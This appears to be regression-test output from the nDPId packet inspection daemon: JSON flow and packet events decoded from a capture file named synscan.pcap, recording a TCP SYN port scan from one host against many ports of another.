-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsms0AADcGdqWsEAAIQA2GNIzSBEDdUoMYAAAAAGACEAAkTwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsCD4AADcGCTWsEAAIQA2GNIzSA+fdUoMYAAAAAGACEAAkqAAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1278275059338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9vMAADkGGH+sEAAIQA2GNIzdAHHcUoIYAAAAAGACCAAyEwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0AAACkGXDKsEAAIQA2GNIzTG57dU4MZAAAAAGACCAAU7gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs0NgAACYGUZqsEAAIQA2GNIzTCJjdU4MZAAAAAGACDAAj9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsa6EAACwGsNGsEAAIQA2GNIzTDOXdU4MZAAAAAGACBAAnpwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8IAADkGn7CsEAAIQA2GNIzTAKPdU4MZAAAAAGACCAAv6QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHD8AADUG9zOsEAAIQA2GNIzTgAzdU4MZAAAAAGACCACwfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAAC0G\/vGsEAAIQA2GNIzTHufdU4MZAAAAAGACCAARpQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAszKQAACgGU86sEAAIQA2GNIzTH6TdU4MZAAAAAGACBAAU6AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4YAADUGr+ysEAAIQA2GNIzTB0bdU4MZAAAAAGACCAApRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKsAACcGrMesEAAIQA2GNIzTJtjdU4MZAAAAAGACEAABtAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VwAADcGHBasEAAIQA2GNIzTK2fdU4MZAAAAAGACEAD9JAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMIAACsG\/LCsEAAIQA2GNIzTAobdU4MZAAAAAGACEAAmBgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/RQAADUGFl6sEAAIQA2GNIzSFxLdUoMYAAAAAGACCAAZfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsApgAADUGENusEAAIQA2GNIzSCPDdUoMYAAAAAGACCAAnnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAscmgAADsGmwqsEAAIQA2GNIzSBrfdUoMYAAAAAGACEAAh2AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/kAADQGmHmsEAAIQA2GNIzSJMrdUoMYAAAAAGACBAAPxQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJwAAC8GyNasEAAIQA2GNIzSJxDdUoMYAAAAAGACEAABfwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FAAADkGPyKsEAAIQA2GNIzSTj\/dUoMYAAAAAGACCADiTwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsew8AAC4Gn2OsEAAIQA2GNIzSEdfdUoMYAAAAAGACDAAauAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAso\/UAADkGa32sEAAIQA2GNIzSIAHdUoMYAAAAAGACCAAQjgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEAAAC4GejKsEAAIQA2GNIzSBSrdUoMYAAAAAGACDAAnZQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFkAADUGaxmsEAAIQA2GNIzSAAPdUoMYAAAAAGACCAAwjAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHIAACYGXgCsEAAIQA2GNIzSBuHdUoMYAAAAAGACDAAlrgAAAgQFtA=="} 